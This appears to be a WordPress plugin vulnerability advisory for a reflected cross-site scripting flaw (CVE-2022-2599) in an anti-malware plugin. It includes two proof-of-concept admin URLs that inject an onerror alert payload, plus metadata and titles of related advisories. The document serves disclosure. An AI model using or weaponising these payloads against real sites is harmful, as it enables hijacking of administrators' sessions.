Anti-Malware Security and Brute-Force Firewall < 4.21.83 – Reflected Cross-Site Scripting | CVE 2022-2599 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E

Also possible with the $_GET['eli'] parameter: http://example.com/wp-admin/admin.php?page=GOTMLS-settings&eli=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E

Affects Plugins

Fixed in 4.21.83

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Submitter twitter

Verified

Yes

WPVDB ID

276a7fc5-3d0d-446d-92cf-20060aecd0ef

Timeline

Publicly Published

2022-08-03 (about 3 years ago)

Added

2022-08-03 (about 3 years ago)

Last Updated

2023-04-12 (about 2 years ago)

Other

Published

Title

Published

2025-11-05

Title

Hotel Booking <= 2.2.7 - Authenticated (Editor+) Stored Cross-Site Scripting

Published

2016-09-07

Title

WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename

Published

2025-12-04

Title

FitVids for WordPress <= 4.0.1 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2014-08-01

Title

Zingiri Web Shop < 2.4.2 - onecheckout.php notes Parameter XSS

Published

2023-01-13

Title

alfred24 Click & Collect <= 1.1.7 - Admin+ Stored XSS